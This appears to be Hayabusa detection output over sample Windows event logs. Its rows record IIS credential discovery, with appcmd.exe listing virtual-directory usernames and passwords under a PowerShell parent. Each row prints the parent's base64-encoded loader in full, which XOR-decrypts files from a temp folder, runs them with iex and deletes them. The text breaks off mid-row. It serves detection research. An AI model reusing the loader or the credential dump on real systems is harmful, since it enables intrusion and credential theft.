Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Line Number: 0"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.784 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Line Number: 0"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.894 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.964 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.034 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQ